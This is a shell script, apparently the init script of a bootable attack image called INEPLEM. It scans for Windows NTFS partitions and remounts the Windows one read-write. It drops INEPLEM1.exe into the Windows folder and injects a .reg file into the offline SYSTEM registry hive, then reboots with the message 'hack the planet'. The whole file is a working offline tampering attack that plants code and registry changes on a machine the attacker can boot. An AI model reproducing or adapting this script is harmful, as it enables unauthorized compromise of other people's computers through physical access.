#!/bin/sh

clear
echo "################################################################################"
echo "#                                   INEPLEM                                    #"
echo "################################################################################"

while true; do
	printf "# Install INEPLEM ? [y/n] "
	read -r -s -n 1 response
	printf "%c" "$response"
	echo "                                                    #"
	[ "$response" = "y" ] && break
	if [ "$response" = "n" ]; then
		echo "# OK fine ! Go to tty2 for a shell ! You can press ^C to relaunch INEPLEM.init #"
		echo "################################################################################"
		# Sleep "forever"
		sleep 365d
	fi
done

echo "################################################################################"
echo "# Searching Windows NTFS Drive....                                             #"
for f in $(fdisk -l | grep -E "(NTFS|EFI GPT)" | cut -d " " -f 1)
do
	printf "# Trying %s...    " "$f"
	ntfs-3g -o ro "$f" /mnt
	if [ ! -d "/mnt/Windows/System32" ]; then
		echo "NO                                                    #"
		umount /mnt
		continue
	fi
	echo "YES                                                   #"
	echo "################################################################################"
	umount /mnt
	ntfs-3g -o rw "$f" /mnt
	echo "# Drive mounted in RW                                                          #"
	cp /ineplem/INEPLEM1.exe /mnt/Windows/INEPLEM1.exe
	echo "# INEPLEM1.exe copied                                                          #"
	reged -C -I /mnt/Windows/System32/config/SYSTEM HKEY_LOCAL_MACHINE\\SYSTEM /ineplem/INEPLEM1.reg > /dev/null
	echo "# INEPLEM1.reg applied                                                         #"
	echo "# sha1 from copied file and reg :                                              #"
	sha1sum /ineplem/INEPLEM1.*
	echo "# cat of /ineplem/INEPLEM.sha                                                  #"
	cat /ineplem/INEPLEM.sha
	umount /mnt
	sync
	echo "# File system unmounted                                                        #"
	echo "################################################################################"
	break
done
echo "# INEPLEM have been installed !                                                #"
echo "# Press ENTER to reboot and hack the planet !                                  #"
echo "################################################################################"
read -r
clear

printf "OK"
reboot
